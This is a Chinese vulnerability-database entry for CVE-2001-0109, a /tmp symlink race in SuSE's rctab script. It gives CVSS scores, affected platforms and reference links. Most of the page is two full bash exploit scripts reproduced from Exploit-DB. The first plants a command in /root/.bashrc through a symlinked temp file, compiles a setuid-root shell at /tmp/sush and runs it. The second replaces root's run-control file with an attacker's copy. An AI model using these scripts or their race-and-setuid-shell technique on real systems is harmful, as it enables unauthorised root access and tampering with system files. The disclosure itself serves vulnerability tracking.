CVE-2001-0109
CVSS1.2
发布时间 :2001-03-12 00:00:00
修订时间 :2008-09-05 16:23:17
NMCOE    

[原文]rctab in SuSE 7.0 and earlier allows local users to create or overwrite arbitrary files via a symlink attack on the rctmp temporary file.


[CNNVD]SuSE漏洞(CNNVD-200103-022)

        SuSE 7.0及其早期版本中的rctab存在漏洞。本地用户可以借助rctmp临时文件上的链接攻击创建或浏览任意文件。

- CVSS (基础分值)

CVSS分值: 1.2 [轻微(LOW)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:suse:suse_linux:6.2SuSE SuSE Linux 6.2
cpe:/o:suse:suse_linux:7.0SuSE SuSE Linux 7.0
cpe:/o:suse:suse_linux:6.3SuSE SuSE Linux 6.3
cpe:/o:suse:suse_linux:6.4SuSE SuSE Linux 6.4
cpe:/o:suse:suse_linux:6.1SuSE SuSE Linux 6.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0109
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0109
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200103-022
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/2207
(VENDOR_ADVISORY)  BID  2207
http://archives.neohapsis.com/archives/bugtraq/2001-01/0226.html
(VENDOR_ADVISORY)  BUGTRAQ  20010113 Serious security flaw in SuSE rctab
http://xforce.iss.net/static/5945.php
(UNKNOWN)  XF  rctab-elevate-privileges(5945)
http://archives.neohapsis.com/archives/bugtraq/2001-01/0272.html
(UNKNOWN)  BUGTRAQ  20010117 Re: Serious security flaw in SuSE rctab

- 漏洞信息

SuSE漏洞
低危 未知
2001-03-12 00:00:00 2005-05-02 00:00:00
本地  
        SuSE 7.0及其早期版本中的rctab存在漏洞。本地用户可以借助rctmp临时文件上的链接攻击创建或浏览任意文件。

- 公告与补丁

        

- 漏洞信息 (20554)

SuSE 6.x/7.0 MkDir Error Handling rctab Race Condition Vulnerability (1) (EDBID:20554)
linux local
2001-01-13 Verified
0 IhaQueR
N/A [点击下载]
source: http://www.securityfocus.com/bid/2207/info

rctab is the Run Control Tab script included with the SuSE distribution of the Linux Operating System. SuSE is a freely available, Open Source Operating system maintained by SuSE Incorporated.

A race condition in the rctab script could allow an attacker to either gain elevated privileges, or append to and corrupt system files. This problem exists due to the insecure creation of files in the /tmp directory by the rctab script. Upon execution of the rctab script, rctab creates a subdirectory in the /tmp directory, using directory name rctmpdir.[pid of rctab process]. The script, which is normally run by root, does not check for an already existing rctmpdir.[pid of rctab process] directory. Additionally, the use of the -p flag with mkdir does not generate an error when the directory already exists, allowing the script to continue executing.

This problem makes it possible for a malicious user to guess the future process id of the rctab process, and create a range of directories that either will overwrite system files, or append to other system files and potentially allow elevation of privileges. 

#!/bin/bash
#       any user can force changes to runlevels
#       by IhaQueR

declare -i PLOW
declare -i PHIGH

# CONFIG:

PLOW=1
PHIGH=3

TMP="/tmp"
FAKERC=/tmp/fakerc
RCTMPDIR="rctmpdir"
RCTMP="rctmp"
WRITETO="/root/.bashrc"
SUSH="/tmp/sush"

# what we want to write to $WRITETO (oops...)
declare -i idx
idx=0
rchead=""

while test "$idx" -lt 128 ; do
        rchead="$rchead "
        idx=$(($idx+1))
done

rchead="$rchead chown root.root $SUSH; chmod 4777 $SUSH | cat >/dev/null
<<_DUPA_"

_pwd="$PWD"


#
echo "----------------------------------------------"
echo "|                                            |"
echo "|        local rctab root exploit            |"
echo "|           you would need luck              |"
echo "|       and an admin stupid enough           |"
echo "|            by IhaQueR '2001                |"
echo "|                                            |"
echo "----------------------------------------------"
echo

# test sys
awkl=$(which awk)
if test -x $awkl ; then
        echo "[+] awk found"
else
        echo "[-] awk not found, edit this script :-)"
        exit 1
fi

if test -r /sbin/rctab ; then
        echo "[+] rctab found"
else
        echo "[-] rctab not found, sorry"
        exit 1
fi

# make suid shell
echo "[+] compiling suid shell"
cat << _DUPA_ >/tmp/sush.c
#include <stdio.h>
main(int argc, char** argv) {setuid(0); setgid(0); execv("/bin/sh",
argv); }
_DUPA_

# compile shell
gcc /tmp/sush.c -o $SUSH


# crate dirs
echo "[+] now creating directories"
echo "    this may take a while"
echo

declare -i cnt
cnt=$PLOW
umask 000

while [ $cnt -lt $PHIGH ]
do
        cnt=$(($cnt+1))
        if [ $(($cnt % 128)) -eq 0 ] ; then
                printf "[%6d] " $cnt
        fi;
        if [ $(($cnt % 1024)) -eq 0 ] ; then
                echo
        fi;
        mkdir -p "$TMP/$RCTMPDIR.$cnt"
done

echo
echo
echo "    finished creating dirs"
echo

# wait for rctab -e
declare -i rctabpid
rctabpid=0
echo "[+] waiting for root to run rctab"

while [ 1 ]
do
        rctabpid=`ps aux|grep "rctab -e"|grep root|head -n1|awk '{print $2}'`
        if test $rctabpid -gt 1 ; then
                break
        fi
        sleep 1
done

# rcfile in
rcfile="/tmp/rctmpdir.$rctabpid/$RCTMP"

# append our cmd
echo >$rcfile "$rchead"

echo "[+] got rctab -e at pid $rctabpid"

# test if we own the directory
rcdir="/tmp/rctmpdir.$rctabpid"

if test -O $rcdir ; then
        echo "[+] ok, we own the dir"
else
        echo "[-] hm, we are not owner"
        exit 2
fi

# wait for editor
declare -i vipid
vipid=0
while [ $vipid -lt 1 ]
do
        vipid=`ps aux|grep rctmpdir|grep root|awk '{print $2}'`
done

echo "    root is editing now at pid $vipid, wait for writing $rcfile"
sleep 1

pfile="/proc/$vipid"

# relink
declare -i lcnt
lcnt=$(wc -l $rcfile|awk '{print $1-2 }')
tail -n$lcnt $rcfile >$rcfile.new
rm -rf $rcfile
ln -sf $WRITETO $rcfile

if test -r "$WRITETO" ; then
        md=$(cat $WRITETO|md5sum)
fi

if test -r $WRITETO ; then
        ac=$(ls -l --full-time $WRITETO)
else
        ac="none"
fi

# wait for root to write rctab or exit
while test -d $pfile
do
        if test -r "$WRITETO" ; then
                oc="$(ls -l --full-time $WRITETO)"
                if test "$ac" != "$oc" ; then
                        echo "[+] $WRITETO replaced"
                        break
                fi
        fi
done
rm -rf $rcfile; ln -s $rcfile.new $rcfile

if test "$md" = "$(cat $WRITETO|md5sum)" ; then
        echo "[-] bashrc not changed, sorry"
        exit 2
else
        echo "[+] gotcha! wait for root to login"
fi

# now wait for root to login :-)
while test -O $SUSH ; do
        sleep 1
done

echo "[+] suid shell at $SUSH"
sleep 1
$SUSH
		

- 漏洞信息 (20555)

SuSE 6.x/7.0 MkDir Error Handling rctab Race Condition Vulnerability (2) (EDBID:20555)
linux local
2001-01-13 Verified
0 IhaQueR
N/A [点击下载]
source: http://www.securityfocus.com/bid/2207/info
 
rctab is the Run Control Tab script included with the SuSE distribution of the Linux Operating System. SuSE is a freely available, Open Source Operating system maintained by SuSE Incorporated.
 
A race condition in the rctab script could allow an attacker to either gain elevated privileges, or append to and corrupt system files. This problem exists due to the insecure creation of files in the /tmp directory by the rctab script. Upon execution of the rctab script, rctab creates a subdirectory in the /tmp directory, using directory name rctmpdir.[pid of rctab process]. The script, which is normally run by root, does not check for an already existing rctmpdir.[pid of rctab process] directory. Additionally, the use of the -p flag with mkdir does not generate an error when the directory already exists, allowing the script to continue executing.
 
This problem makes it possible for a malicious user to guess the future process id of the rctab process, and create a range of directories that either will overwrite system files, or append to other system files and potentially allow elevation of privileges. 

#!/bin/bash
#       any user can force changes to runlevels
#       by IhaQueR

declare -i PLOW
declare -i PHIGH


# CONFIG:

PLOW=1
PHIGH=3

TMP="/tmp"
FAKERC="/tmp/fakerc"
RCTMPDIR="rctmpdir"
RCTMP="rctmp"

_pwd="$PWD"

#
echo "----------------------------------------------"
echo "|                                            |"
echo "|             rctab exploit                  |"
echo "|            by IhaQueR '2001                |"
echo "|                                            |"
echo "----------------------------------------------"
echo

# crate dirs
echo "[+] now creating directories"
echo "    this may take a while"
echo

declare -i cnt
cnt=$PLOW
umask 700

while [ $cnt -lt $PHIGH ]
do
        cnt=$(($cnt+1))
        if [ $(($cnt % 128)) -eq 0 ] ; then
                printf "[%6d] " $cnt
        fi;
        if [ $(($cnt % 1024)) -eq 0 ] ; then
                echo
        fi;
        mkdir -p "$TMP/$RCTMPDIR.$cnt"
done

echo
echo
echo "    finished creating dirs"
echo

# wait for rctab -e
declare -i rctabpid
rctabpid=0
echo "[+] waiting for root to run rctab"

while [ 1 ]
do
        rctabpid=`ps aux|grep "rctab -e"|grep root|head -n1|awk '{print $2}'`
        if test $rctabpid -gt 1 ; then
                break
        fi
        sleep 1
done

# rcfile in
rcfile="/tmp/rctmpdir.$rctabpid/$RCTMP"

echo "[+] got rctab -e at pid $rctabpid"

# test if we own the directory
rcdir="/tmp/rctmpdir.$rctabpid"

if test -O $rcdir ; then
        echo "[+] ok, we own the dir"
else
        echo "[-] hm, we are not owner"
        exit 2
fi

# wait for root to finish editing
sleep 4
declare -i vipid
vipid=`ps aux|grep rctmpdir|grep root|awk '{print $2}'`

echo "    root is editing now at $vipid, wait for $rcfile"

pfile="/proc/$vipid"

while test -d $pfile
do
        echo -n >/dev/null
done
rm -rf $rcfile
cp $FAKERC $rcfile

echo "[+] gotcha!"
echo "    installed new rctab from $FAKERC"
		

- 漏洞信息

1727
SuSE MkDir Error Handling rctab Race Condition
Local Access Required Race Condition
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2001-01-13 Unknow
2001-01-13 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站